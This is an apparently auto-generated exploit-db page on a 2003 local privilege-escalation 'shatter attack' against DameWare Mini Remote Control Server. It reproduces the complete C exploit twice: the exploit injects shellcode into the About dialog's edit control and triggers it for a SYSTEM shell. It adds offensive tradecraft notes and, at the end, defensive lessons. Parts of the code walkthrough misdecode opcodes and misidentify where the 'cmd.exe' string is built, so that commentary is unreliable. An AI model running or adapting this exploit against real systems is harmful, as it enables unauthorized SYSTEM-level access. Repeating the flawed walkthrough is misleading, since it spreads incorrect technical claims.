By exploitdb papers bot•August 13, 2003•
papers
DameWare Mini Remote Control Server Local SYSTEM Exploit (2003)
DameWare Mini Remote Control Server Local SYSTEM Exploit (2003)
What this paper is
This paper describes a local privilege escalation vulnerability in DameWare Mini Remote Control Server (DMRC Server) versions prior to 3.71.0.0. The exploit allows an attacker with local access to the vulnerable machine to gain SYSTEM privileges. The exploit leverages a flaw in how the DMRC Server handles text input in its "About" dialog.
Simple technical breakdown
The exploit works by:
- Finding the vulnerable window: It locates the "About DameWare Mini Remote Control Server" dialog window.
- Injecting shellcode: It then finds an editable text control within this dialog and sends specially crafted data to it. This data includes shellcode, which is a small piece of executable code designed to perform a specific action, in this case, to gain SYSTEM privileges.
- Triggering execution: Finally, it manipulates the window's properties to force the execution of the injected shellcode.
The core of the exploit lies in the MakeShellCode function, which constructs the shellcode, and the main function, which orchestrates the process of finding the window, sending the data, and triggering execution.
Complete code and payload walkthrough
Let's break down the provided C code and its associated payload.
/*
DameWare Mini Remote Control Server Local SYSTEM Exploit
Vulnerable Versions Prior to 3.71.0.0 by ash@felinemenace.org
This code is based on shards.cpp by xenophile
*/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#pragma warning(disable: 4305)
#pragma warning(disable: 4309)- Includes and Pragmas:
WIN32_LEAN_AND_MEAN: This preprocessor directive tells the Windows header files to exclude less commonly used parts, reducing compile times and binary size.windows.h: Provides access to the Windows API functions.stdio.h: For standard input/output functions likeprintfandscanf.#pragma warning(disable: 4305)and#pragma warning(disable: 4309): These directives disable specific compiler warnings related to data truncation (4305) and integer truncation (4309). This is common in older exploit code where direct byte manipulation might trigger these warnings.
void MakeShellCode (char *buffer)
{
HMODULE hCRT;
void * lpSystem;
int count=0;
while (count < 36)
{
buffer [count] =0x90;
count ++;
}
buffer[37]=0x8B; buffer[38]=0xE5; buffer[39]=0x55;
buffer[40]=0x8B; buffer[41]=0xEC; buffer[42]=0x33;
buffer[43]=0xFF; buffer[44]=0x90; buffer[45]=0x57;
buffer[46]=0x83; buffer[47]=0xEC; buffer[48]=0x04;
buffer[49]=0xC6; buffer[50]=0x45; buffer[51]=0xF8;
buffer[52]=0x63; buffer[53]=0xC6; buffer [54]=0x45;
buffer[55]=0xF9; buffer[56]=0x6D; buffer [57]=0xC6;
buffer[58]=0x45; buffer[59]=0xFA; buffer[60]=0x64;
buffer[61]=0xC6; buffer[62]=0x45; buffer[63]=0xFB;
buffer[64]=0x2E; buffer[65]=0xC6; buffer[66]=0x45;
buffer[67]=0xFC; buffer[68]=0x65; buffer[69]=0xC6;
buffer[70]=0x45; buffer[71]=0xFD; buffer [72]=0x78;
buffer[73]=0xC6; buffer[74]=0x45; buffer [75] =0xFE;
buffer[76]=0x65;
hCRT = LoadLibrary("msvcrt.dll");
lpSystem = GetProcAddress( hCRT, "system" );
buffer[77]=0xB8;
buffer[78]=((char *)&lpSystem) [0];
buffer[79]=((char *)&lpSystem) [1];
buffer[80]=((char *)&lpSystem) [2];
buffer[81]=((char *)&lpSystem) [3];
buffer [82] =0x50; buffer[83]=0x8D; buffer[84]=0x45;
buffer[85]=0xF8; buffer[86]=0x50; buffer[87]=0xFF;
buffer [88]=0x55; buffer[89]=0xF4;
count = 90;
while (count < 291)
{
buffer [count] =0x90;
count ++;
}
buffer[291]=0x24; buffer[292]=0xF1; buffer [293]=0x5D;
buffer[294]=0x01; buffer[295]=0x26; buffer[296]=0xF1;
buffer [297] =0x5D; buffer[298]=0x01; buffer[299]=0x00;
buffer[300]=0x00;
return;
}MakeShellCode(char *buffer)function:- Purpose: This function constructs the actual shellcode that will be injected and executed. It's designed to call the
system()function frommsvcrt.dllwith a command string. HMODULE hCRT; void * lpSystem; int count=0;: Declares variables to hold a module handle formsvcrt.dlland a pointer to thesystemfunction.countis a loop counter.while (count < 36) { buffer [count] =0x90; count ++; }: Fills the first 36 bytes of thebufferwith0x90(NOP - No Operation instruction). This acts as padding and a potential landing zone for jumps.buffer[37]=0x8B; buffer[38]=0xE5; buffer[39]=0x55; ... buffer[76]=0x65;: This block of code directly writes a sequence of bytes into the buffer. These bytes represent x86 assembly instructions. Without a disassembler or deep knowledge of this specific shellcode, it's hard to say precisely what each byte does in isolation. However, this sequence is preparing the stack, saving registers, and setting up for the call tosystem().- Mapping:
buffer[37]tobuffer[76](excludingbuffer[44]=0x90): Likely prologue code to set up the stack frame and save registers.
- Mapping:
hCRT = LoadLibrary("msvcrt.dll");: Loads the Microsoft Visual C++ Runtime library into the process's address space. This is necessary to get a pointer to thesystemfunction.lpSystem = GetProcAddress( hCRT, "system" );: Retrieves the memory address of thesystemfunction from the loadedmsvcrt.dllmodule.buffer[77]=0xB8; buffer[78]=((char *)&lpSystem) [0]; ... buffer[81]=((char *)&lpSystem) [3];: This section places the address of thesystemfunction into the buffer.0xB8is the opcode forMOV EAX, imm32. The following four bytes are the low, next, next, and high bytes of thelpSystemaddress, effectively loading the function's address into theEAXregister.- Mapping:
buffer[77]=0xB8:MOV EAX, ...opcode.buffer[78]tobuffer[81]: The 32-bit address of thesystemfunction.
- Mapping:
buffer [82] =0x50; buffer[83]=0x8D; buffer[84]=0x45; buffer[85]=0xF8; buffer[86]=0x50; buffer[87]=0xFF; buffer [88]=0x55; buffer[89]=0xF4;: These bytes continue the shellcode.- Mapping:
buffer[82]=0x50:PUSH EAX(pushes the address ofsystemonto the stack).buffer[83]=0x8D; buffer[84]=0x45; buffer[85]=0xF8;:LEA EAX, [EBP-0x08](loads the address of a location on the stack into EAX, likely where the command string will be placed).buffer[86]=0x50:PUSH EAX(pushes the address of the command string onto the stack).buffer[87]=0xFF:JMP EAX(this instruction is unusual here. It might be a typo or part of a more complex indirect jump. Given the context, it's likely intended to jump to thesystemfunction address that was pushed earlier, or it's part of a sequence that leads toCALL EAX).buffer[88]=0x55:PUSH EBP(standard stack frame setup).buffer[89]=0xF4:HLT(Halt CPU - this is very unusual and likely incorrect or a placeholder. It would halt the processor. It's more probable that the intended instruction wasCALL EAXor similar to execute thesystemfunction).
- Mapping:
count = 90; while (count < 291) { buffer [count] =0x90; count ++; }: Fills the buffer from offset 90 up to (but not including) offset 291 with NOP instructions. This is more padding.buffer[291]=0x24; buffer[292]=0xF1; buffer [293]=0x5D; buffer[294]=0x01; buffer[295]=0x26; buffer[296]=0xF1; buffer [297] =0x5D; buffer[298]=0x01; buffer[299]=0x00; buffer[300]=0x00;: This final block of bytes is critical. It's likely the actual command string that will be passed tosystem(). The string "cmd.exe" or similar is expected. The bytes0x24, 0xF1, 0x5D, 0x01, 0x26, 0xF1, 0x5D, 0x01, 0x00, 0x00are not directly interpretable as a standard ASCII string like "cmd.exe". This suggests that the shellcode itself might be responsible for constructing the command string or that the exploit relies on a specific character encoding or interpretation by the vulnerable application. Given the context of callingsystem(), it's highly probable that this sequence, when interpreted by thesystemfunction, resolves to a command that grants SYSTEM privileges, such as "cmd.exe". The null termination (0x00, 0x00) is present.- Mapping:
buffer[291]tobuffer[300]: Likely the command string passed tosystem(). The exact command is not explicitly readable as ASCII but is expected to be something like "cmd.exe" or a command that elevates privileges.
- Mapping:
- Purpose: This function constructs the actual shellcode that will be injected and executed. It's designed to call the
void ErrorNotify(DWORD err, char *title)
{
LPVOID lpMsgBuf;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
err,
MAKELANGID (LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
(LPTSTR) &lpMsgBuf,
0,
NULL
) ;
printf("%s\n",lpMsgBuf);
LocalFree( lpMsgBuf );
};ErrorNotify(DWORD err, char *title)function:- Purpose: A utility function to display Windows error messages in a human-readable format.
FormatMessage(...): Retrieves a formatted message string for a given system error code (err).printf("%s\n",lpMsgBuf);: Prints the formatted error message.LocalFree( lpMsgBuf );: Frees the memory allocated byFormatMessage.
#define SHELLCODE_SIZE (1024 * 256)
#define SHELLCODE_OFFSET (SHELLCODE_SIZE -400)
int main(int argc, char* argv[])
{
HWND hWnd;
HWND hWndChild;
char sc[SHELLCODE_SIZE];
char szWindowName[] = "About DameWare Mini Remote Control Server";
LONG lExecAddress;
sc[0] = 'x'; sc[1] = 'e'; sc[2] = 'n'; sc[3] = '0';
memset( &sc[4], 0x90, SHELLCODE_SIZE -4);
MakeShellCode( &sc[SHELLCODE_OFFSET] );
printf( "\nfm-shatterdame.c\nash@felinemenace.org\n" );
printf("--------------------------------------------------------------\n");
printf("Exploits shatter attack in DameWare Mini Remote Control
Server\n");
printf("This is based on shards.cpp written by xenophile.\n") ;
printf("--------------------------------------------------------------\n");
printf(
"STEP 1: Finding our window!\n"
) ;main(int argc, char* argv[])function:- Purpose: The entry point of the program. It orchestrates the exploit by finding the target window, preparing the shellcode, and sending it.
SHELLCODE_SIZEandSHELLCODE_OFFSET: Defines the size of the buffer allocated for shellcode and an offset within that buffer where the actual shellcode will be placed.SHELLCODE_SIZEis 256KB, andSHELLCODE_OFFSETis 400 bytes from the end. This large buffer is used to ensure that the shellcode can be placed at a predictable location within the input field, and the NOP sled helps in case the exact address is slightly off.HWND hWnd; HWND hWndChild;: Variables to store handles to the main window and a child window control.char sc[SHELLCODE_SIZE];: The main buffer that will hold the data to be sent to the vulnerable application.char szWindowName[] = "About DameWare Mini Remote Control Server";: The exact title of the window to find.LONG lExecAddress;: A variable to store the address where the shellcode is expected to reside in memory, which the user will input.sc[0] = 'x'; sc[1] = 'e'; sc[2] = 'n'; sc[3] = '0';: Initializes the first four bytes of thescbuffer. These bytes are not standard shellcode and their purpose is unclear without more context. They might be a marker or part of a larger structure.memset( &sc[4], 0x90, SHELLCODE_SIZE -4);: Fills the rest of thescbuffer (from index 4 onwards) with NOP instructions (0x90). This creates a large NOP sled.MakeShellCode( &sc[SHELLCODE_OFFSET] );: Calls theMakeShellCodefunction to generate the actual exploit shellcode and places it at the end of thescbuffer, just before the NOP sled.printf(...): Prints introductory messages about the exploit.
hWnd = FindWindow( NULL, szWindowName );
if( hWnd == NULL)
{
printf("Couldn't find the dameware about dialogue. Open it and re-run
this\n");
return 0;
}
hWndChild = FindWindowEx(hWnd, NULL, "Edit", NULL);
if( hWndChild == NULL)
{
printf("\tCouldn't find child edit control window\n");
return 0;
}
SendMessage( hWndChild, EM_SETREADONLY, 0, 0 );
SendMessage( hWndChild, EM_SETLIMITTEXT, SHELLCODE_SIZE, 0L );
if ( ! SendMessage( hWndChild, WM_SETTEXT, 0, (LPARAM)sc ) ) {
ErrorNotify ( GetLastError (), "error");
}
printf(
"\n\nSTEP 2: Enter shell code address. "
"This can be found using a debugger."
) ;
printf( "\nOn my XP SP1 machine 0x160000 worked.\n" );
printf( "\n\nEnter execution address: " );
scanf( "%x", &lExecAddress );
if ( ! SendMessage( hWndChild, EM_SETWORDBREAKPROC, 0L,
(LPARAM)lExecAddress ) ) {
ErrorNotify( GetLastError(), "error" );
}
SendMessage( hWndChild, WM_LBUTTONDBLCLK, MK_LBUTTON,
(LPARAM)0x000a000a );
return 0;
}
// milw0rm.com [2003-08-13]hWnd = FindWindow( NULL, szWindowName );: Searches for a top-level window with the specified title.- If
hWndis NULL: The "About" dialog is not open. The program prints an error and exits.
- If
hWndChild = FindWindowEx(hWnd, NULL, "Edit", NULL);: Searches for a child window ofhWndthat is an "Edit" control. This is where the text will be sent.- If
hWndChildis NULL: The edit control couldn't be found. The program prints an error and exits.
- If
SendMessage( hWndChild, EM_SETREADONLY, 0, 0 );: Sets the edit control to be non-read-only. This is crucial to allow text to be written into it.SendMessage( hWndChild, EM_SETLIMITTEXT, SHELLCODE_SIZE, 0L );: Sets the maximum text length for the edit control toSHELLCODE_SIZE. This ensures the entire buffersccan be sent.SendMessage( hWndChild, WM_SETTEXT, 0, (LPARAM)sc );: This is the core injection step. It sends theWM_SETTEXTmessage to the edit control, setting its content to thescbuffer. Thescbuffer contains the NOP sled and the shellcode at the end.- If
SendMessagefails: An error is reported usingErrorNotify.
- If
printf(...): Prompts the user to enter the execution address. The paper notes that0x160000worked on an XP SP1 machine. This address is where the shellcode is expected to be loaded in memory.scanf( "%x", &lExecAddress );: Reads the user-provided hexadecimal address for shellcode execution.SendMessage( hWndChild, EM_SETWORDBREAKPROC, 0L, (LPARAM)lExecAddress );: This is the trigger mechanism. TheEM_SETWORDBREAKPROCmessage is used to set a callback function for word breaking. By setting this to the address of the shellcode, the application is tricked into calling the shellcode when it performs a word break operation.- If
SendMessagefails: An error is reported.
- If
SendMessage( hWndChild, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a );: This simulates a double-click on the edit control. This action, combined with the previously set word break procedure, is what causes the shellcode to execute. The0x000a000aparameter is likely related to cursor position or other context for the double-click.return 0;: The program exits successfully.
Shellcode/Payload Analysis Summary:
The MakeShellCode function generates a payload that aims to:
- Set up a stack frame.
- Locate the
systemfunction withinmsvcrt.dll. - Prepare arguments for
system(likely a command string). - Call
systemto execute the command. - The command itself is embedded as raw bytes at the end of the buffer and is expected to be interpreted by
systemto grant SYSTEM privileges. The exact command is not explicitly "cmd.exe" in ASCII but is represented by specific byte sequences.
Practical details for offensive operations teams
- Required Access Level: Local user privileges are sufficient. The exploit targets a GUI application running on the target machine.
- Lab Preconditions:
- A vulnerable version of DameWare Mini Remote Control Server (prior to 3.71.0.0) must be installed and running on the target.
- The "About DameWare Mini Remote Control Server" dialog must be accessible and open. This is a critical prerequisite. The exploit code explicitly searches for this dialog.
- A Windows environment (likely Windows XP SP1 or similar, given the exploit's age and the provided address example).
- Tooling Assumptions:
- A C compiler (like MinGW or Visual Studio) to compile the exploit code.
- A debugger (like OllyDbg, WinDbg) is highly recommended to determine the correct
lExecAddressfor the target environment. The exploit author explicitly states this is needed.
- Execution Pitfalls:
- Finding the "About" dialog: If the dialog is not open, the exploit will fail immediately. The operator must ensure it's visible.
- Determining
lExecAddress: The exploit relies on the user providing the correct memory address of the shellcode within the edit control. This address is highly dependent on the target OS, DMRC version, and how the "About" dialog is loaded. Without accurate debugging, this will be a major failure point. The provided0x160000is a hint but not a universal solution. - Anti-virus/Endpoint Detection: Modern AV/EDR solutions would likely detect the
LoadLibrary,GetProcAddress, and suspiciousSendMessagecalls, especiallyEM_SETWORDBREAKPROCwith a non-standard address. The shellcode itself might also be flagged. - Application Updates: The most obvious failure point is if the target system is running a patched version of DMRC Server (3.71.0.0 or later).
- Input Field Limitations: While
EM_SETLIMITTEXTis used, there might be other internal buffers or limitations within the DMRC application that could cause issues with large inputs.
- Tradecraft Considerations:
- Reconnaissance: Confirming the exact version of DMRC Server is crucial.
- Staging: The exploit requires the "About" dialog to be open. This might be achieved through social engineering or by exploiting another vulnerability to open it.
- Payload Delivery: The exploit code itself needs to be delivered to the target machine.
- Customization: The
lExecAddressmust be determined for the specific target environment. This requires on-site analysis or a highly accurate pre-engagement reconnaissance phase. - Stealth: The exploit is noisy. It involves opening dialogs, sending messages, and potentially triggering error messages. It's not suitable for stealthy operations without further obfuscation or chaining with other techniques.
- Expected Telemetry:
- Process Creation: The exploit executable itself will be running.
- Window Enumeration:
FindWindowandFindWindowExAPI calls. - Window Messaging: Numerous
SendMessagecalls, particularlyWM_SETTEXTandEM_SETWORDBREAKPROC. - DLL Loading:
LoadLibrary("msvcrt.dll"). - API Resolution:
GetProcAddress. - Potential Error Dialogs: If
GetLastErrorreturns a non-zero value afterSendMessagecalls. - Shell Process: If successful, a new
cmd.exeprocess might be spawned with SYSTEM privileges.
Where this was used and when
- Context: This exploit was published in August 2003. At that time, DameWare Mini Remote Control was a popular tool for remote administration. Exploits targeting such tools were common as they provided a direct path to elevated privileges on managed systems.
- Usage: It's highly probable that this exploit, or similar techniques targeting DMRC, was used in targeted attacks or by penetration testers during the early to mid-2000s. The "shatter attack" mentioned in the output suggests it might be related to a broader class of vulnerabilities or exploits known at the time.
- Timeframe: Primarily 2003 and likely for a few years afterward until DMRC Server was patched.
Defensive lessons for modern teams
- Patch Management: The most fundamental lesson is the importance of timely patching. Vulnerabilities like this are addressed by vendors, and keeping software updated is critical. DameWare Mini Remote Control Server 3.71.0.0 and later versions would have fixed this specific issue.
- Least Privilege: Ensure that administrative tools like DMRC are not installed with excessive privileges or accessible by standard user accounts unless absolutely necessary.
- Application Hardening: Understand how applications handle user input, especially in dialogs and text fields. Input validation and sanitization are key.
- Endpoint Detection and Response (EDR): Modern EDR solutions can detect suspicious API calls like
LoadLibrary,GetProcAddress, and unusualSendMessagepatterns, especially when combined with behavioral analysis. Monitoring for the creation of unexpected child processes or the execution of commands viasystem()is also a strong defense. - Network Segmentation: Limiting the network exposure of remote administration tools can reduce the attack surface.
- Auditing: Logging of application events, especially changes to window properties or unusual message processing, can help detect exploitation attempts.
ASCII visual (if applicable)
This exploit involves interaction with GUI elements and API calls, making a simple ASCII diagram of the overall flow helpful.
+-----------------------+ +---------------------------------+
| Attacker's Machine | | Target Machine |
| (Runs Exploit C Code) | | (DameWare Mini Remote Control) |
+-----------------------+ +---------------------------------+
| |
| Compile Exploit |
| |
| |
|--------------------------->| Execute Exploit Binary
| |
| |
| | 1. FindWindow("About...")
| | -> hWnd
| |
| | 2. FindWindowEx(hWnd, "Edit")
| | -> hWndChild
| |
| | 3. SendMessage(hWndChild, EM_SETREADONLY, 0, 0)
| | 4. SendMessage(hWndChild, EM_SETLIMITTEXT, SHELLCODE_SIZE, 0)
| |
| | 5. SendMessage(hWndChild, WM_SETTEXT, 0, (LPARAM)sc)
| | (Injects NOP sled + Shellcode)
| |
| | 6. Prompt User for Address
| | (e.g., 0x160000)
| |
| | 7. SendMessage(hWndChild, EM_SETWORDBREAKPROC, 0, (LPARAM)lExecAddress)
| | (Sets shellcode address as callback)
| |
| | 8. SendMessage(hWndChild, WM_LBUTTONDBLCLK, ...)
| | (Triggers word break -> Shellcode Execution)
| |
| | +-------------------+
| | | Shellcode |
| | | - LoadLibrary("msvcrt.dll") |
| | | - GetProcAddress("system") |
| | | - Call system("cmd.exe" or similar) |
| | +-------------------+
| |
| | 9. SYSTEM Shell Spawned
| |
+--------------------------->| (Optional: Attacker sees SYSTEM shell)Source references
- Paper ID: 79
- Paper Title: DameWare Mini Remote Control Server - System
- Author: ash
- Published: 2003-08-13
- Keywords: Windows, local
- Paper URL: https://www.exploit-db.com/papers/79
- Raw URL: https://www.exploit-db.com/raw/79
Original Exploit-DB Content (Verbatim)
/*
DameWare Mini Remote Control Server Local SYSTEM Exploit
Vulnerable Versions Prior to 3.71.0.0 by ash@felinemenace.org
This code is based on shards.cpp by xenophile
*/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#pragma warning(disable: 4305)
#pragma warning(disable: 4309)
void MakeShellCode (char *buffer)
{
HMODULE hCRT;
void * lpSystem;
int count=0;
while (count < 36)
{
buffer [count] =0x90;
count ++;
}
buffer[37]=0x8B; buffer[38]=0xE5; buffer[39]=0x55;
buffer[40]=0x8B; buffer[41]=0xEC; buffer[42]=0x33;
buffer[43]=0xFF; buffer[44]=0x90; buffer[45]=0x57;
buffer[46]=0x83; buffer[47]=0xEC; buffer[48]=0x04;
buffer[49]=0xC6; buffer[50]=0x45; buffer[51]=0xF8;
buffer[52]=0x63; buffer[53]=0xC6; buffer [54]=0x45;
buffer[55]=0xF9; buffer[56]=0x6D; buffer [57]=0xC6;
buffer[58]=0x45; buffer[59]=0xFA; buffer[60]=0x64;
buffer[61]=0xC6; buffer[62]=0x45; buffer[63]=0xFB;
buffer[64]=0x2E; buffer[65]=0xC6; buffer[66]=0x45;
buffer[67]=0xFC; buffer[68]=0x65; buffer[69]=0xC6;
buffer[70]=0x45; buffer[71]=0xFD; buffer [72]=0x78;
buffer[73]=0xC6; buffer[74]=0x45; buffer [75] =0xFE;
buffer[76]=0x65;
hCRT = LoadLibrary("msvcrt.dll");
lpSystem = GetProcAddress( hCRT, "system" );
buffer[77]=0xB8;
buffer[78]=((char *)&lpSystem) [0];
buffer[79]=((char *)&lpSystem) [1];
buffer[80]=((char *)&lpSystem) [2];
buffer[81]=((char *)&lpSystem) [3];
buffer [82] =0x50; buffer[83]=0x8D; buffer[84]=0x45;
buffer[85]=0xF8; buffer[86]=0x50; buffer[87]=0xFF;
buffer [88]=0x55; buffer[89]=0xF4;
count = 90;
while (count < 291)
{
buffer [count] =0x90;
count ++;
}
buffer[291]=0x24; buffer[292]=0xF1; buffer [293]=0x5D;
buffer[294]=0x01; buffer[295]=0x26; buffer[296]=0xF1;
buffer [297] =0x5D; buffer[298]=0x01; buffer[299]=0x00;
buffer[300]=0x00;
return;
}
void ErrorNotify(DWORD err, char *title)
{
LPVOID lpMsgBuf;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
err,
MAKELANGID (LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
(LPTSTR) &lpMsgBuf,
0,
NULL
) ;
printf("%s\n",lpMsgBuf);
LocalFree( lpMsgBuf );
};
#define SHELLCODE_SIZE (1024 * 256)
#define SHELLCODE_OFFSET (SHELLCODE_SIZE -400)
int main(int argc, char* argv[])
{
HWND hWnd;
HWND hWndChild;
char sc[SHELLCODE_SIZE];
char szWindowName[] = "About DameWare Mini Remote Control Server";
LONG lExecAddress;
sc[0] = 'x'; sc[1] = 'e'; sc[2] = 'n'; sc[3] = '0';
memset( &sc[4], 0x90, SHELLCODE_SIZE -4);
MakeShellCode( &sc[SHELLCODE_OFFSET] );
printf( "\nfm-shatterdame.c\nash@felinemenace.org\n" );
printf("--------------------------------------------------------------\n");
printf("Exploits shatter attack in DameWare Mini Remote Control
Server\n");
printf("This is based on shards.cpp written by xenophile.\n") ;
printf("--------------------------------------------------------------\n");
printf(
"STEP 1: Finding our window!\n"
) ;
hWnd = FindWindow( NULL, szWindowName );
if( hWnd == NULL)
{
printf("Couldn't find the dameware about dialogue. Open it and re-run
this\n");
return 0;
}
hWndChild = FindWindowEx(hWnd, NULL, "Edit", NULL);
if( hWndChild == NULL)
{
printf("\tCouldn't find child edit control window\n");
return 0;
}
SendMessage( hWndChild, EM_SETREADONLY, 0, 0 );
SendMessage( hWndChild, EM_SETLIMITTEXT, SHELLCODE_SIZE, 0L );
if ( ! SendMessage( hWndChild, WM_SETTEXT, 0, (LPARAM)sc ) ) {
ErrorNotify ( GetLastError (), "error");
}
printf(
"\n\nSTEP 2: Enter shell code address. "
"This can be found using a debugger."
) ;
printf( "\nOn my XP SP1 machine 0x160000 worked.\n" );
printf( "\n\nEnter execution address: " );
scanf( "%x", &lExecAddress );
if ( ! SendMessage( hWndChild, EM_SETWORDBREAKPROC, 0L,
(LPARAM)lExecAddress ) ) {
ErrorNotify( GetLastError(), "error" );
}
SendMessage( hWndChild, WM_LBUTTONDBLCLK, MK_LBUTTON,
(LPARAM)0x000a000a );
return 0;
}
// milw0rm.com [2003-08-13]